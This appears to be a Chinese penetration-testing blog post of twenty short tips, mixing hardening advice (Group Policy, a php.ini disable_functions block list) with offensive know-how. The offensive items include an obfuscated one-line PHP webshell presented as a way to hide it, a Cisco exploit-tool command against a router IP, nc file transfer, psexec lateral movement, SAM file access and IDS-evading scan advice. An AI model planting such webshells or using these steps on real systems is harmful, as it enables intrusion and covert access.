滲透測試筆記五
滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學習心得。為保證質量,每一篇為20條左右的滲透小記。
1、小小一招,讓你的電腦安全起來:在“運行”對話框中輸入“gpedit.msc”打開“本地組策略編輯器”窗口,展開“用戶配置/管理模板/系統”目錄,可雙擊配置禁止運行指定程序、禁止訪問注冊表、禁止訪問命令提示符、禁止訪問控制面板等策略。
2、在注冊表編輯器中,依次打開HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug分支,雙擊“Auto”鍵值項,可以防止系統隱私信息被泄露。(應該是禁止生成dmp文件。)
3、HTTP協議代理服務器常用端口號:
80(Apache服務器默認、Nginx服務器默認、lighttpd服務器默認) 8080(tomcat服務器默認、kangle服務器默認) 3128(Squid服務器默認) 8081(用戶習慣) 9080(WebSpher服務器默認) 7001(weblogic的默認端口)
4、在php.ini禁止一些危險函數的執行:
如果不希望執行包括system()等在那的能夠執行命令的php函數,或者能夠查看php信息的phpinfo()等函數,那么我們就可以禁止它們:
disable_functions = system,passthru,exec,shell_exec,popen,phpinfo
如果你要禁止任何文件和目錄的操作,那么可以關閉很多文件操作:
disable_functions = chdir,chroot,dir,getcwd,opendir,readdir,scandir,fopen,unlink,delete,copy,mkdir, rmdir,rename,file,file_get_contents,fputs,fwrite,chgrp,chmod,chown
此時就能夠抵制大部分的phpshell了。
5、一個非常聰(淫)明(蕩)的隱藏一句話方法:
$asse=$asse{0}.$asse{1}.$asse{1}.$asse{2}.$asse{3}.$asse{4}; @$asse($_POST[$_GET['s']]);
6、默認情況下,Linux系統的TTL值為64或255,Windows NT/2000/XP系統的默認TTL值為128,Win7系統的TTL值是64,Windows 98系統的TTL值為32,UNIX主機的TTL值為255。(但這是可以修改的)
7、在使用Nmap掃描端口的時候,端口狀態可能會出現filtered / unfiltered.filtered是指有防火墻或是其他過濾裝置在對這個端口進行過濾,所以Nmap需要進一步查明端口是否開放;unfiltered狀態只有在大多數的掃描端口都處在filter狀態下才出現,說明Nmap能夠訪問這個端口,但是不清楚這個端口打開的狀態。
8、安全漏洞生命周期(圖片摘自諸葛建偉《Matesploit滲透測試魔鬼訓練營》)

9、msfpayload、msfencode和msfvenom可以將攻擊載荷封裝為可執行文件、C語言、JavaScript語言等多種形式,并可以進行各種類型的編碼。
10、Metasploit攻擊載荷模塊分為獨立(Singles)、傳輸器(Stager)、傳輸體(Stage)三種類型。
例如:“windows/shell_bind_tcp”是一個獨立攻擊載荷。“windows/shell/bind_tcp”是一個由傳輸器載荷(bind_tcp)和一個傳輸體載荷(shell)所組成,其功能相當于“windows/shell_bind_tcp”。
11、Metasploit在自動為payload選擇編碼器進行編碼時,可能找不到合適的編碼器。因為這個編碼器既能夠將編碼后的payload大小控制在一定范圍內,又要完全避免出現“壞字符”。這種情況下就會出現“No encoder encoded the buffer succcessfully”報錯。
12、BackTrack5 升級Metasploit至Git更新的方法 (無法使用msfupdate解決方法):
(1)用vim修改文件:
/opt/metasploit/ruby/lib/ruby/1.9.1/i686-linux/rbconfig.rb changed the line => CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) -l$(RUBY_SO_NAME)-static" by => CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) "(其實就是去掉-l$(RUBY_SO_NAME)-static)
(2)切換至
/opt/metasploit/msf3
然后運行
/opt/metasploit/ruby/bin/bundle install
(3)
msfupdate
(小編親測不行,是由于我以前對MSF的改動較多嗎?各位騷年還是換Kali吧!不過如果不是特別專業的滲透測試人員,沒必要總是保持最新狀態,不必在乎這些細節 :))
13、利用BT5檢查cisco路由器是否出現漏洞
定位到以下目錄:
/pentest/cisco/cisco-global-exploiter
運行名為cge.pl的Perl文件,這個文件沒有任何選項。根據運行的版本的不同,屏幕上最多會出現14個不同的選項,每個選項都會引用一個試圖利用不同漏洞的腳本。這能夠幫助企業更有效地測試路由器面向外部的接口,企業應該經常進行測試。91ri.org注:這個是在backtrack下的 其他滲透系統自行find
假設測試的路由器有一個外部IP地址200.1.1.1,輸入以下命令:
./cge.pl 200.1.1.1 2
14、大家都知道思科的默認用戶名和默認密碼都是cisco,很多管理員喜歡把enable口令改成class。
15、安全帳戶管理器多年來一直是微軟操作系統的核心部分,現在也是Windows 8.1的一部分。SAM的功能固定于lsass.exe中。lsass.exe是一個位于c:\Windows\system32的Windows服務。
16、SAM的備份文件位于c:\windows\system32\repair\。如果密碼被定期更改,過期密碼會包含在這個文件中,但登錄到計算機的任何賬戶都可以訪問到這個文件。只需要在機器上創建一個普通帳戶,就可以查看了。
17、ssh反彈內網端口幾個比較重要的參數:
1-f: 連接成功后切換到后臺,不會占用當前的shell,shell斷了也會繼續執行,相當于 nohup和&。
2-N: 連接后不調用shell
3-R:把本地網絡(可以是本機或者任何內網甚至外網端口)端口反彈到ssh服務器
18、用nc方法往linux系統傳文件:
先在服務端監聽:
nc -l port > 文件名
然后到要發送文件的服務器:
nc 服務端ip 端口 < 文件名
(注:發送小文件還行,大文件有時候會斷。)
19、有些時候你拿了linux服務器的shell,想跨到windows的機器上,基本就是通過兩個手段,一個是針對windows的服務進行exploit溢出,還有就是利用在linux上搜集的用戶名和密碼然后通過psexec放shell。
20、想要確定是不是windows主機,在內網掃開445和3389的機器,基本是windows了。掃的時候要注意,不管用什么工具,盡量用socket connect的方式掃。像SYN 方式掃描如果內網有ids之類肯定會被發現,connect方式掃描相對來說和正常連接差不多。